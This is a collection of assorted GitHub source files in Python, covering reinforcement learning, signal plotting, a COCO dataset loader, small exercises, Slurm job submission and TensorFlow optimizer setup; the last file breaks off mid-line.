+{"seq_id":"26348344192","text":"import numpy as np\nfrom collections import defaultdict\n\nclass Agent:\n\n def __init__(self, nA=6):\n \"\"\" Initialize agent.\n\n Params\n ======\n - nA: number of actions available to the agent\n \"\"\"\n self.nA = nA\n self.Q = defaultdict(lambda: np.zeros(self.nA))\n self.alpha = .09\n self.gamma = 1.0\n\n def select_action(self, state,i_episode):\n \"\"\" Given the state, select an action.\n\n Params\n ======\n - state: the current state of the environment\n\n Returns\n =======\n - action: an integer, compatible with the task's action space\n \"\"\"\n epsilon = 1.0/i_episode\n policy_s = np.ones(self.nA)*epsilon/self.nA\n policy_s[np.argmax(self.Q[state])] = 1 - epsilon + (epsilon / self.nA)\n \n action = np.random.choice(np.arange(self.nA), p =policy_s)\n \n \n return action\n\n def step(self, state, action, reward, next_state, done):\n \"\"\" Update the agent's knowledge, using the most recently sampled tuple.\n\n Params\n ======\n - state: the previous state of the environment\n - action: the agent's previous choice of action\n - reward: last reward received\n - next_state: the current state of the environment\n - done: whether the episode is complete (True or False)\n \"\"\"\n self.Q[state][action] += self.alpha*(reward +(self.gamma*(np.max(self.Q[next_state]))- self.Q[state][action]))\n \n \n \n \n \n #self.Q[state][action] += 1","repo_name":"Ujwal2910/Smart-Traffic-Signals-in-India-using-Deep-Reinforcement-Learning-and-Advanced-Computer-Vision","sub_path":"Traffic Modeling Real Vision Based/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"53"}
+{"seq_id":"3555422741","text":"import numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.mlab as mlab\nfrom scipy import signal\n\n# matplotlib.use('Agg')\n# matplotlib.pyplot.ioff()\nfrom numpy import sin, linspace, pi\nfrom pylab import plot, show, title, xlabel, ylabel, subplot\nfrom scipy import 
fft, arange\nfrom scipy.signal import butter, lfilter, freqz\n\n\ndef plot_frequency(data):\n Fs = 8000\n f = 5\n sample = 8000\n x = np.arange(sample)\n data = np.sin(2 * np.pi * f * x / Fs)\n plt.plot(x, data)\n signal_spectrum = (np.fft.fft(data))\n time_step = 1 / 30\n freqs = (np.fft.fftfreq(signal_spectrum.size, d=time_step))\n plt.plot(freqs, np.abs(signal_spectrum))\n\n\ndef plot_power(x_k):\n ps = np.abs(x_k) ** 2\n time_step = 1 / 30\n freqs = np.fft.fftfreq(x_k.size, time_step)\n idx = np.argsort(freqs)\n plot(freqs[idx], ps[idx])\n\n\ndef plot_spectrum(y, fs, extitle=None, path_to_save=''):\n \"\"\"\n Plots a Single-Sided Amplitude Spectrum of y(t)\n \"\"\"\n n = len(y) # length of the signal\n cut = np.floor(n / 2).astype(int)\n Y = abs(fft(y)) # fft computing and normalization\n Y = Y[0:cut] / cut\n if extitle is None:\n extitle = ''\n\n title('Frequency Spectrum of the signal %s' % (str(extitle)))\n dk = 1 / n\n freq = linspace(0, 0.5 - dk, cut) * fs\n plt.clf()\n plt.plot(freq, Y, 'r') # plotting the spectrum\n xlabel('Freq (Hz)')\n ylabel('|Y(freq)|')\n axes = plt.gca()\n axes.set_ylim([0, Y.max()])\n axes.set_xlim([0, 2000])\n plt.show()\n # plt.savefig('%s/Frequency Spectrum of the signal %s' % (path_to_save, str(extitle)) + '.png', bbox_inches='tight')\n\n\ndef plot_time(y, fs, extitle=None, path_to_save=''):\n n = len(y) # length of the signal\n T = n / fs\n t = np.linspace(0, T, n, endpoint=False)\n if extitle is None:\n extitle = ''\n\n title('Time Domain of the signal %s' % (str(extitle)))\n plt.clf()\n plt.plot(t, y)\n xlabel('Time')\n ylabel('Amplitude')\n plt.show()\n # plt.savefig('%s/Time Domain of the signal %s' % (path_to_save, str(extitle)) + '.png', bbox_inches='tight')\n\n\ndef plot_spectrogram(x_t, fs, xtitle=None, path_to_save=None):\n # plt.clf()\n # plt.specgram(x_t, NFFT=len(x_t), noverlap=0, Fs=fs, window=matplotlib.mlab.window_none)\n # plt.ylabel('Frequency [Hz]')\n # plt.xlabel('Time [sec]')\n # # plt.title(title)\n # plt.show()\n\n frequencies, times, spectrogram = signal.spectrogram(x_t, fs)\n plt.clf()\n title('Spectrogram of the signal %s' % (str(xtitle)))\n plt.pcolormesh(times, frequencies, spectrogram)\n plt.imshow(spectrogram)\n plt.ylabel('Frequency [Hz]')\n plt.xlabel('Time [sec]')\n plt.show()\n\n # plt.savefig('%s/Spectrogram of the signal %s' % (path_to_save, str(xtitle)) + '.png', bbox_inches='tight')\n pass\n\n\ndef plot_psd(x_t, fs, xtitle, path_to_save):\n f, Pxx_den = signal.periodogram(x_t, fs)\n plt.clf()\n plt.semilogy(f, Pxx_den)\n title('PSD of the signal %s' % (str(xtitle)))\n plt.xlabel('frequency [Hz]')\n plt.ylabel('PSD [V**2/Hz]')\n plt.show()\n pass\n\n\ndef plot_time_freq(x_t, fs, title='', path_to_save=None):\n return\n x_t = remove_dc(x_t, 100, 1400, fs)\n x_t = normalize(x_t)\n\n plot_time(x_t, fs, title, path_to_save)\n plot_spectrum(x_t, fs, title, path_to_save)\n plot_spectrogram(x_t, fs, title, path_to_save)\n plot_psd(x_t, fs, title, path_to_save)\n\n\ndef normalize(x_m, min=-1, max=1):\n # x_m -= np.mean(x_m)\n min = np.min(x_m)\n max = np.max(x_m)\n\n normalized_data = np.array([2 * (x - min) / (max - min) - 1 for i, x in enumerate(x_m)]).reshape(-1, )\n normalized_data -= np.mean(normalized_data) # Remove DC Component\n return normalized_data\n\n\ndef butter_bandpass(lowcut, highcut, fs, order=5):\n nyq = 0.5 * fs\n low = lowcut / nyq\n high = highcut / nyq\n b, a = butter(order, [low, high], btype='band')\n return b, a\n\n\ndef remove_dc(data, lowcut, highcut, fs, order=5):\n b, a = butter_bandpass(lowcut, 
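    # lowcut/highcut are given in Hz; butter_bandpass() (defined above) divides
    # them by the Nyquist frequency (fs/2) before designing the Butterworth filter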
highcut, fs, order=order)\n y = lfilter(b, a, data)\n return y\n","repo_name":"Jasemalsadi/AsthmaPrediction","sub_path":"core_code/Feature_Extraction/helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":4073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71442388969","text":"# print all prime number in interval\n\ndef prime(x,y):\n prime_list = []\n for i in range(x,y):\n if i==0 or i==1:\n break\n else:\n for j in range(2,int(i/2)+1):\n if i % j == 0:\n break\n else:\n prime_list.append(i)\n return prime_list\n\nstarting_range = 2\nending_range = 10\nlst = prime(starting_range, ending_range)\n\nif len(lst) == 0:\n print(\"There are no prime number\")\nelse:\n print(\"There are prime number\",lst)","repo_name":"smitjogani/python","sub_path":"feb/feb25.py","file_name":"feb25.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32301561631","text":"# -*- coding:utf-8 -*-\n\n# ---------------------------------------------\n# @file test_yml.py\n# @description test_yml\n# @author WcJun\n# @date 2021/07/15\n# ---------------------------------------------\nimport os\n\nimport pytest\nimport requests\n\nfrom src.main.python.util.yml_reader import YmlReader\n\n# yaml_directory_path = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))\nyml_path = os.path.join(os.getcwd() + '{}src{}main{}resources{}test_yml.yml'.format(os.sep, os.sep, os.sep, os.sep))\nreader = YmlReader(yml_path)\ncontent = reader.read_yml()\n\n\nclass TestRefreshAccessToken:\n \"\"\"\n refresh access token\n \"\"\"\n\n @pytest.mark.parametrize('context', content)\n def test_refresh_access_token(self, context):\n \"\"\"\n do refresh access token\n \"\"\"\n url = context['request']['url']\n parameters = context['request']['parameters']\n response = requests.get(url=url, params=parameters)\n print(response.text)\n","repo_name":"photowey/pytest-in-action","sub_path":"src/main/python/testyml/test_yml.py","file_name":"test_yml.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40916496495","text":"from abc import ABCMeta, abstractmethod, ABC\r\n\r\nfrom file_loader import PandasLoader\r\nfrom settings import logger\r\n\r\n\r\nclass ISchedule(ABC):\r\n __metaclass__ = ABCMeta\r\n\r\n @abstractmethod\r\n def get_schedule_str(self, day: str) -> str:\r\n raise NotImplementedError\r\n\r\n\r\nclass PandasSchedule(ISchedule):\r\n def __init__(self, filename: str, course: str, group: str):\r\n self.schedule = PandasLoader().get_excel(filename, course)\r\n self.group_num = int(group[-1])\r\n self.day_case = {\r\n \"понедельник\": \"понедельник\",\r\n \"вторник\": \"вторник\",\r\n \"среда\": \"среду\",\r\n \"четверг\": \"четверг\",\r\n \"пятница\": \"пятницу\",\r\n \"суббота\": \"субботу\"}\r\n self.days = list(self.day_case.keys())\r\n\r\n def get_schedule_str(self, day: str) -> str:\r\n if self.schedule is None:\r\n return \"Произошла ошибка на сервере, расписание недоступно\"\r\n day_sch = f\"Расписание на {self.day_case[day]}\\n\"\r\n max_pairs_in_day = 8\r\n for i in range(self.days.index(day) * max_pairs_in_day + 1, (self.days.index(day) + 1) * max_pairs_in_day):\r\n time = str(self.schedule[self.schedule.columns[1]].tolist()[i])\r\n cell_value = str(self.schedule[self.schedule.columns[self.group_num + 
1]].tolist()[i]).split('\\\\')\r\n if len(cell_value) == 1 and cell_value[0] == \"nan\":\r\n day_sch += f\"\\n⌚{time}⌚\\nНет пары\\n\"\r\n elif len(cell_value) != 5:\r\n logger.warning(\"get_schedule_str(): the number of fields is not correct, check schedule file\")\r\n day_sch += f\"\\n⌚{time}⌚\\nError\\n\"\r\n else:\r\n subj, pair_type, teacher, audi, form = cell_value\r\n day_sch += \\\r\n (f\"\\n⌚{time}⌚\\n\" +\r\n f\"{subj}\\n\" +\r\n f\"{pair_type}\\n\" +\r\n f\"Преподаватель: {teacher}\\n\" +\r\n f\"Аудитория: {audi}\\n\" +\r\n f\"Форма проведения: {form}\\n\")\r\n return day_sch\r\n","repo_name":"letimofeev/falt-bot-12","sub_path":"version2/schedule.py","file_name":"schedule.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30041006721","text":"from torchvision.datasets import CocoDetection\nfrom torchvision.transforms import v2\nfrom torch.utils.data import DataLoader\nimport torch\nfrom utils.Datautil import custom_collate_fn, convert_coco_format_to_pascal_voc\n\n\nclass CustomCocoDataset(CocoDetection):\n \"\"\"\n A custom dataset class derived from PyTorch's CocoDetection class, tailored for handling both detection and\n segmentation tasks using the COCO dataset format. It extends the standard COCO dataset functionality by\n allowing custom transformations and handling different tasks like detection and segmentation.\n\n Attributes:\n task (str): Indicates the type of task ('detection' or 'segmentation').\n transform (callable, optional): A function/transform that takes in an image and returns a transformed version.\n \"\"\"\n\n def __init__(self, root, ann_file, task='detection', transform=None):\n \"\"\"\n Initialize the dataset.\n\n Parameters:\n root (str): Directory where images are located.\n ann_file (str): Path to COCO annotation file.\n task (str): Task type - 'detection' or 'segmentation'.\n transform (callable, optional): Optional transform to be applied on a sample.\n \"\"\"\n super(CustomCocoDataset, self).__init__(root, ann_file)\n self.task = task\n self.transform = transform\n\n def __len__(self):\n \"\"\"\n Return the number of items in the dataset.\n\n Returns:\n int: Total number of items in the dataset.\n \"\"\"\n return len(self.ids) # `ids` is a list of annotation IDs, part of CocoDetection\n\n def __getitem__(self, idx):\n \"\"\"\n Get an item from the dataset.\n\n Parameters:\n idx (int): Index of the item.\n\n Returns:\n tuple: (image, target) where target depends on the task.\n \"\"\"\n img, annotations = super(CustomCocoDataset, self).__getitem__(idx)\n # Initialize containers for bbox, labels, and (if needed) masks\n boxes = []\n labels = []\n masks = [] # Only used if task is 'segmentation'\n image_id = annotations[0]['image_id'] if annotations else -1\n img_w, img_h = img.size\n\n for ann in annotations:\n # Extract label\n labels.append(ann['category_id'])\n # Extract bounding box\n boxes.append(ann['bbox'])\n\n if self.task == 'segmentation':\n # Extract segmentation mask\n masks.append(ann['segmentation'][0])\n\n converted_box = convert_coco_format_to_pascal_voc(torch.as_tensor(boxes, dtype=torch.float32))\n if self.transform:\n img, converted_box = self.transform(img, converted_box)\n\n new_target = {\n 'boxes': converted_box,\n 'labels': torch.as_tensor(labels, dtype=torch.int64),\n 'image_id': torch.tensor([image_id]) # Encapsulate image_id in a tensor\n }\n\n if self.task == 'segmentation':\n new_target['masks'] = torch.as_tensor(masks, 
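        # caution: 'masks' holds the raw COCO polygon coordinate lists (one per
        # annotation), not rasterized bitmaps, so this tensor conversion assumes
        # the polygons have equal length; rasterize first if they do not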
dtype=torch.float32)\n\n return img, new_target\n\n @staticmethod\n def get_transform(base_data, train=True):\n \"\"\"\n Returns a composed transform function.\n\n Parameters:\n base_data (str): The dataset that pretrained model is originally trained with.\n train (bool): Flag to indicate if the transform is for training or validation.\n\n Returns:\n A transform function composed of several individual transforms.\n \"\"\"\n pretrained_pixel_stats = {'imagenet': {'mean': [0.485, 0.456, 0.406], 'std': [0.229, 0.224, 0.225]}\n }\n norm_mean = pretrained_pixel_stats[base_data]['mean']\n norm_std = pretrained_pixel_stats[base_data]['std']\n\n if train:\n # Example of adding more transforms for training\n return v2.Compose([\n v2.Resize(1024),\n v2.RandomHorizontalFlip(),\n v2.RandomRotation(15),\n v2.ToTensor(),\n v2.Normalize(mean=norm_mean, std=norm_std)\n ])\n else:\n # Transforms for validation/testing\n return v2.Compose([\n v2.Resize(1024),\n v2.ToTensor(),\n v2.Normalize(mean=norm_mean, std=norm_std)\n ])\n\n\ndef create_data_loader(dataset_path, base_data, task, annotation_file, batch_size, train=True):\n \"\"\"\n Creates a data loader for the CustomCocoDataset.\n\n Parameters:\n dataset_path (str): Path to the dataset directory.\n base_data (str): The dataset that pretrained model is originally trained with.\n task (str): Tge cv task from which the ground truths are extracted\n annotation_file (str): Path to the annotation file.\n batch_size (int): Batch size for the data loader.\n train (bool): Flag indicating training or validation loader.\n\n Returns:\n DataLoader: A PyTorch DataLoader object.\n \"\"\"\n dataset = CustomCocoDataset(root=dataset_path,\n ann_file=annotation_file,\n task=task,\n transform=CustomCocoDataset.get_transform(base_data, train))\n\n loader = DataLoader(dataset,\n batch_size=batch_size,\n shuffle=train,\n num_workers=4,\n collate_fn=custom_collate_fn)\n\n return loader\n","repo_name":"berkisler/lensor_damage_detection","sub_path":"src/dataset/Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":5532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40975046988","text":"from unicodedata import name\n\n\n#Dictionary\n'''\nnameList = {\"name\": \"Alejandro\", \"lastName\": \"Ramos\"}\nitem = { \"_id\": \"1\", \"name\": \"Iphone 11\", \"category\": \"Smartphone\"}\n\n\nprint(nameList[\"name\"], \"\\n\", item[\"name\"])\n \nnameList[\"age\"] = 18\n\nprint(nameList[\"age\"], \"\\n\", item[\"name\"])\n\n'''\n#add to a dictionary\n'''\nfirstName = str(input(\"Whats your name? \"))\nlastName = str(input(\"Whats your last name? \"))\nage = int(input(\"Whats your age? \"))\njob = str(input(\"Whats your job? 
\"))\n\nperson = {}\n\nperson[\"name\"] = firstName\nperson[\"lastName\"] = lastName\nperson[\"age\"] = age\nperson[\"job\"] = job\n\nprint(person)\n\n'''\n\norderNumeric = {1: \"one\", 2: \"three\"}\nnewOrder = {2: \"two\"}\n\n# updates the value of key 2\norderNumeric.update(newOrder)\n\nprint(orderNumeric)\n\nnewOrder = {3: \"three\"}\n\n# adds element with key 3\norderNumeric.update(newOrder)\n\nprint(orderNumeric)\n\n","repo_name":"alejandrosilveiraramos/moreDevsTwoBlu","sub_path":"classes/module04/ex01.py","file_name":"ex01.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"45511947188","text":"import datetime\n\nfrom django.contrib.auth.models import AbstractUser, User\nfrom django.core.exceptions import ValidationError\nfrom django.db import models\n\nfrom django.db.models import CASCADE\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.utils.timezone import make_aware\n\nfrom accounts.models import UserProfile\nfrom studios.models import Studio\nfrom datetime import date\nimport pandas\nimport calendar\n\n\n# Create your models here.\nclass ClassSet(models.Model):\n studio = models.ForeignKey(to=Studio, on_delete=CASCADE, related_name='class_studio')\n name = models.CharField(max_length=200)\n description = models.CharField(max_length=200)\n coach = models.CharField(max_length=200)\n start = models.DateTimeField()\n end_time = models.TimeField()\n reoccur_until = models.DateField()\n capacity = models.PositiveIntegerField()\n\n def clean(self):\n if self.start is not None and self.end_time is not None:\n # Makes sure that the time is in the correct order\n if self.start.time() > self.end_time:\n raise ValidationError('Start time should be before end time')\n else:\n # Doesn't allow the user to input an invalid time\n raise ValidationError('Date Time Format is incorrect')\n # Makes sure that the days is in the correct order\n if self.start.date() > self.reoccur_until:\n raise ValidationError('Start day should be before end day')\n\n def __str__(self):\n return str(self.name)\n\n def delete(self, using=None, keep_parents=False):\n # Get today's date\n today = date.today()\n # Gets the range of dates between the start and end date\n date_range = pandas.date_range(today, self.reoccur_until, freq='D')\n # Gets the id of the class set\n class_set_ids = ClassSet.objects.filter(id=self.id)\n for set_id in class_set_ids:\n for a_date in date_range:\n try:\n # Deletes all future occurrences of the class\n start_date_time = datetime.datetime.combine(a_date, self.start.time())\n ClassSession.objects.get(name=set_id, start_date_time=start_date_time).delete()\n except:\n pass\n\n\n@receiver(post_save, sender=ClassSet)\ndef save_class(sender, instance, **kwargs):\n # Gets the first three letters of the weekday that the 1st day starts with\n day = calendar.day_name[instance.start.date().weekday()][:3]\n # Gets the range of dates between the start and end date\n date_range = pandas.date_range(instance.start.date(), instance.reoccur_until, freq=f'W-{day}')\n exists = ClassSession.objects.filter(name=instance)\n if exists:\n first_class = exists[0].start_date_time.date()\n last_class = exists[0].start_date_time.date()\n for a_class in exists:\n # Shortened duration\n if a_class.start_date_time.date() < instance.start.date():\n a_class.delete()\n if a_class.start_date_time.date() > instance.reoccur_until:\n a_class.delete()\n # Find the earliest 
class in the set\n if a_class.start_date_time.date() < first_class:\n first_class = a_class.start_date_time.date()\n # Find the last class in the set\n if a_class.start_date_time.date() > last_class:\n last_class = a_class.start_date_time.date()\n # Update all fields\n a_class.name = instance\n a_class.description = instance.description\n a_class.coach = instance.coach\n a_class.save()\n # Extends the start date\n if first_class > instance.start.date():\n new_start_range = pandas.date_range(instance.start.date(),\n first_class - datetime.timedelta(days=1), freq=f'W-{day}')\n create_class(instance, new_start_range)\n # Extends the end date\n if last_class < instance.reoccur_until:\n new_end_range = pandas.date_range(last_class + datetime.timedelta(days=1),\n instance.reoccur_until, freq=f'W-{day}')\n create_class(instance, new_end_range)\n else:\n print('int')\n # Creates a class session for each date\n create_class(instance, date_range)\n\n\ndef create_class(instance, date_range):\n for date in date_range:\n class_session = ClassSession.objects.create(\n name=instance,\n description=instance.description,\n coach=instance.coach,\n start_date_time=datetime.datetime.combine(date, instance.start.time()),\n end_time=instance.end_time,\n enrolled=0\n )\n class_session.save()\n\n\nclass ClassSession(models.Model):\n name = models.ForeignKey(to=ClassSet, on_delete=CASCADE, related_name='class_name')\n description = models.CharField(max_length=200)\n coach = models.CharField(max_length=200)\n start_date_time = models.DateTimeField()\n end_time = models.TimeField()\n enrolled = models.PositiveIntegerField(default=0)\n\n def __str__(self):\n return str(f'{self.name} -- {self.start_date_time.date()}')\n\n\nclass Keyword(models.Model):\n classSession = models.ForeignKey(to=ClassSession, on_delete=CASCADE)\n word = models.CharField(max_length=200)\n\n def __str__(self):\n return self.word\n\n\nclass EnrolledUser(models.Model):\n user = models.ForeignKey(to=UserProfile, on_delete=models.CASCADE)\n class_session = models.ForeignKey(to=ClassSession, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(f'{self.user.first_name} -- {self.class_session}')\n","repo_name":"pritheeroy/toronto_fitness_club","sub_path":"PF/back-end/classes/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5751,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19552876947","text":"import os\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\n\n# Check for environment variable\nif not os.getenv(\"DATABASE_URL\"):\n raise RuntimeError(\"DATABASE_URL is not set\")\n\n# Configure session to use filesystem\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\n# Set up database\nengine = create_engine(os.getenv(\"DATABASE_URL\"))\ndb = scoped_session(sessionmaker(bind=engine))\n\ndef main():\n \n f = open(\"books.csv\")\n reader = csv.reader(f)\n for isbn,title,author,year in reader:\n db.execute(\"INSERT INTO books(isbn,title,author,year) VALUES(:isbn, :title, :author, :year)\", {\"isbn\": isbn, \"title\": title, \"author\": author, \"year\": year})\n print(\"Addin book from {author}....\" )\n db.commit()\n\nif __name__ ==\"__main__\":\n 
main()\n","repo_name":"aliyumuhammad01/CS50-project1","sub_path":"import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9398277552","text":"#%% template\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 18 11:32:11 2019\n\n@author: ibahadiraltun\n\"\"\"\n\nimport collections\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport glob\nimport sys\nimport os\n\nDIR_PATH = os.getcwd()\nPATH = '/Users/ibahadiraltun/Desktop/CLEF-2019-CheckThat/CLEF2019_Task1/data/submissions/solution_cont1/vectors/'\npath_to_vectors = [PATH + 'categories/', PATH + 'named_entity/', PATH + 'part_of_speech/', PATH + 'bigram/']\n\ncolumns = ['linenumber', 'speaker', 'text', 'label']\ntrain_files = []\ntest_files = []\nbigram_list = []\nmp = collections.defaultdict()\nvec_all = np.zeros((0, 0))\nvec_cnt = 0\n\ndef read_files():\n for file in glob.glob(\"../test/*.tsv\"): test_files.append(file)\n for file in glob.glob(\"../training/tsv_data/*.tsv\"): train_files.append(file)\n print('------\\n', train_files, ' \\n\\n-----\\n')\n run_algo()\n\ndef save_y_train_vector(vec):\n fpath = '/Users/ibahadiraltun/Desktop/CLEF-2019-CheckThat/CLEF2019_Task1/data/submissions/solution_cont1/vectors/y_train.txt'\n np.savetxt(fpath, vec, fmt = '%f')\n\ndef save_X_train_vector(vec):\n fpath = '/Users/ibahadiraltun/Desktop/CLEF-2019-CheckThat/CLEF2019_Task1/data/submissions/solution_cont1/vectors/X_train.txt'\n np.savetxt(fpath, vec, fmt = '%f')\n\ndef save_X_test_vector(fname, vec):\n fpath = '/Users/ibahadiraltun/Desktop/CLEF-2019-CheckThat/CLEF2019_Task1/data/submissions/solution_cont1/vectors/X_test/' + fname\n np.savetxt(fpath, vec, fmt = '%f')\n\ndef run_algo():\n for file in test_files:\n fname = file.split('/')[2]\n vec_prev = np.loadtxt('X_test/' + fname, dtype = 'f')\n vec_speaker = np.loadtxt('speakers/test/' + fname, dtype = 'f')\n vec_cur = np.concatenate((vec_prev, vec_speaker), axis = 1)\n save_X_test_vector(fname, vec_cur)\n vec_all = np.zeros((0, 33))\n for file in train_files:\n fname = file.split('/')[3]\n vec = np.loadtxt('speakers/train/' + fname, dtype = 'f')\n vec_all = np.concatenate((vec_all, vec), axis = 0)\n vec_prev = np.loadtxt('X_train.txt', dtype = 'f')\n vec_cur = np.concatenate((vec_prev, vec_all), axis = 1)\n save_X_train_vector(vec_cur)\n return None\n\nif __name__ == '__main__':\n read_files()","repo_name":"ibahadiraltun/CLEF-2019","sub_path":"CLEF2019_Task1/data/submissions/solution_cont1/vectors/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35850026748","text":"pessoa = []\r\ndados = []\r\nmaior = menor = 0\r\nwhile True:\r\n dados.append(input(\"Nome: \"))\r\n dados.append(float(input('Peso: ')))\r\n if len(pessoa) == 0:\r\n maior = menor = dados[1]\r\n else:\r\n if dados[1] > maior:\r\n maior = dados[1]\r\n if dados[1] < menor:\r\n menor = dados[1]\r\n\r\n pessoa.append(dados[:])\r\n dados.clear()\r\n parar = input('Deseja continuar? [S/N]').upper().strip()\r\n while parar != 'S' and parar != 'N':\r\n parar = input('Deseja continuar? [S/N]').upper().strip()\r\n if parar == 'N':\r\n break\r\nprint(f'Ao todo, você cadastrou {len(pessoa)} Pessoas.')\r\n\r\nprint(f'O maior peso encontrado foi: {maior}Kg. 
Os pesos sao de :', end=' ')\r\nfor p in pessoa:\r\n if p[1] == maior:\r\n print(f'[{p[0]}]', end=' e ')\r\nprint(f'\\nO menor peso encontrado foi: {menor}Kg. Os pesos sao de :', end=' ')\r\nfor p in pessoa:\r\n if p[1] == menor:\r\n print(f'[{p[0]}]', end=' e ')\r\n ","repo_name":"HebertZanatelli/Python","sub_path":"CursoEmVideo/Exercicios/084.py","file_name":"084.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22367553134","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 24 17:16:09 2021\n\n@author: joshuaumiamaka\n\"\"\"\n\ntry:\n from commands import getoutput\nexcept:\n from subprocess import getoutput\nimport glob\nimport random\nimport time\nfrom astropy.io import fits\nimport tqdm\n\n\ndef get_number_of_jobs():\n return len(getoutput(\"squeue | grep $USER\").split('\\n'))\n\nfiles_made = glob.glob(\"file-home*F115W*fits\")\n#files_made = [item.replace(\"F115W\", \"f115w\") for item in files_made]\n\nfor image in tqdm.tqdm(glob.glob('/home/tatumumi/supernova_lts/JWST_Vela/*/*/*/*/*f115w/*a0.[2-9]*_same_scale.fits')):\n output_image_name = \"file\" + image.replace(\"/\", \"-\").replace(\"f115w\", \"F115W\")\n run_this_image = False\n\n if files_made.count(output_image_name) == 0:\n run_this_image = True\n print(\"Couldn't find \", output_image_name, \"rerunning\")\n else:\n try:\n for filt in [\"F115W\", \"F150W\", \"F277W\", \"F444W\"]:\n f = fits.open(output_image_name.replace(\"F115W\", filt))\n f.close()\n print(\"opened \", output_image_name.replace(\"F115W\", filt), \"okay\")\n\n run_this_image = False # output_image_name exists, and it's a valid fits file\n except:\n print(\"Found \", output_image_name, \"but there was a problem opening it\")\n run_this_image = True\n\n\n \n if run_this_image:\n f = open(\"sub.sh\", 'w')\n f.write(\"#!/bin/bash\\n\")\n f.write(\"#SBATCH --job-name=example\\n\")\n f.write(\"#SBATCH --partition=shared\\n\")\n f.write(\"#SBATCH --time=0-00:05:00 ## time format is DD-HH:MM:SS\\n\")\n f.write(\"#SBATCH --nodes=1\\n\")\n f.write(\"#SBATCH --cpus-per-task=1\\n\")\n f.write(\"#SBATCH --mem=4G # Memory per node my job requires\\n\")\n f.write(\"#SBATCH --error=example-%A.err # %A - filled with jobid, where to write the stderr\\n\")\n f.write(\"#SBATCH --output=example-%A.out # %A - filled with jobid, wher to write the stdout\\n\")\n f.write(\"source ~/.bash_profile\\n\")\n f.write(\"cd /home/tatumumi/supernova_lts/JWST_Machine_Learning\\n\")\n f.write(\"python MachineLearningProjectFinal.py \" + image)\n f.close()\n\n while get_number_of_jobs() > 150:\n print(\"Too many jobs. 
Checking again soon.\")\n time.sleep(3.)\n\n print(getoutput(\"sbatch sub.sh\"))\n time.sleep(0.25)\n \n","repo_name":"tatumumi/JWST_Machine_Learning","sub_path":"runJob.py","file_name":"runJob.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18565590524","text":"import os\nimport logging\nimport tensorflow as tf\nimport tensorflow.keras as keras\nfrom tensorflow.keras.callbacks import ModelCheckpoint\nfrom tensorflow.keras.callbacks import CSVLogger\nimport newton_cg as es\nfrom schedulers import ExponentialDecayCustom\n\n\nclass CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule):\n def __init__(self, d_model, warmup_steps=4000):\n super(CustomSchedule, self).__init__()\n self.d_model = d_model\n self.d_model = tf.cast(self.d_model, tf.float32)\n self.warmup_steps = warmup_steps\n\n def __call__(self, step):\n arg1 = tf.math.rsqrt(step)\n arg2 = step * (self.warmup_steps ** -1.5)\n return tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1, arg2)\n\n\ndef set_tf_loglevel(level):\n if level >= logging.FATAL:\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n if level >= logging.ERROR:\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n if level >= logging.WARNING:\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = '1'\n else:\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = '0'\n logging.getLogger('tensorflow').setLevel(level)\n\n\ndef set_optimizers(cfg_optimizers, d_model):\n optimizers = []\n if \"Adam\" in cfg_optimizers and cfg_optimizers[\"Adam\"]:\n for adam_kwargs in cfg_optimizers[\"Adam\"]:\n if adam_kwargs['learning_rate'] == 'CustomSchedule':\n adam_kwargs.pop(\"learning_rate\")\n opt = tf.keras.optimizers.Adam(learning_rate=CustomSchedule(d_model), **adam_kwargs)\n optimizers.append((opt, \"Adam\", 'CustomSchedule'))\n else:\n opt = tf.keras.optimizers.Adam(**adam_kwargs)\n optimizers.append((opt, \"Adam\", adam_kwargs['learning_rate']))\n\n if \"SGD\" in cfg_optimizers and cfg_optimizers[\"SGD\"]:\n for sgd_kwargs in 